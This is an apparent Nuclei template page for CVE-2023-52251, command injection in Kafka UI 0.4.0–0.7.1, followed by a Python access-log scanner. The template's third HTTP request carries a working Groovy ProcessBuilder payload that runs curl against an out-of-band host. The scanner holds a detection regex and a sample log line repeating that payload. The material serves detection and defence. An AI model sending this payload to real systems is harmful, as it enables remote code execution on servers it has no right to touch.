Kafka UI 0.7.1 Command Injection
ID: CVE-2023-52251
Severity: high
Author: yhy0,iamnoooob
Tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm
Description
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
YAML Source
id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.03218
    epss-percentile: 0.91206
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm

http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'

  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'

  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4a0a00473045022100a85e8d047d39594cc241ab93b56f92cc2de792b9eb3818d11ff7bfe95a586c4c0220678d97ef16232aa0decdd70cc0fada72e42b5dc4a3feaffde1651aeadd37bf9b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-52251.yaml"
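Alongside an active scan, the request shape this template sends (the messages endpoint called with filterQueryType=GROOVY_SCRIPT and a script in q) can be searched for in access logs collected in front of Kafka UI. The following is an added example, not part of the template or of the Nuclei or kafka-ui projects; the combined access-log format, the token list and the names classify and scan are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Message-browsing endpoint named in the CVE description.
MESSAGES_PATH = re.compile(r"^/api/clusters/[^/]+/topics/[^/]+/messages/?$")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Tokens that do not belong in a message filter (assumed starter list).
SUSPICIOUS = re.compile(
    r"ProcessBuilder|Runtime|GroovyShell|Class\.forName|\.execute\s*\(|\.start\s*\(",
    re.I,
)

# Constructed sample lines; addresses and hosts are documentation values.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /api/clusters/local/topics/orders/messages?q=new+ProcessBuilder%28%22curl%22%2C%22example.invalid%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&limit=100 HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Jan/2024:12:03:10 +0000] "GET /api/clusters/local/topics/orders/messages?q=value.contains%28%22error%22%29&filterQueryType=GROOVY_SCRIPT&limit=100 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [10/Jan/2024:12:04:55 +0000] "GET /api/clusters/local/topics/orders/messages?q=error&filterQueryType=STRING_CONTAINS&limit=100 HTTP/1.1" 200 1024',
    '198.51.100.9 - - [10/Jan/2024:12:05:02 +0000] "GET /api/clusters HTTP/1.1" 200 128',
]


def classify(line):
    """Return None, 'groovy-filter' or 'groovy-exec' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not MESSAGES_PATH.match(url.path):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    types = [v.upper() for v in params.get("filterQueryType", [])]
    if "GROOVY_SCRIPT" not in types:
        return None
    script = " ".join(params.get("q", []))
    # Any Groovy filter is worth review on 0.4.0-0.7.1; process or class
    # loading tokens in the script raise the priority.
    return "groovy-exec" if SUSPICIOUS.search(script) else "groovy-filter"


def scan(lines):
    """Return (line_number, verdict) for every line that used a Groovy filter."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

A script can be written to avoid any fixed token list, so on affected versions treat every groovy-filter hit from an unexpected client as a lead, not only the groovy-exec ones.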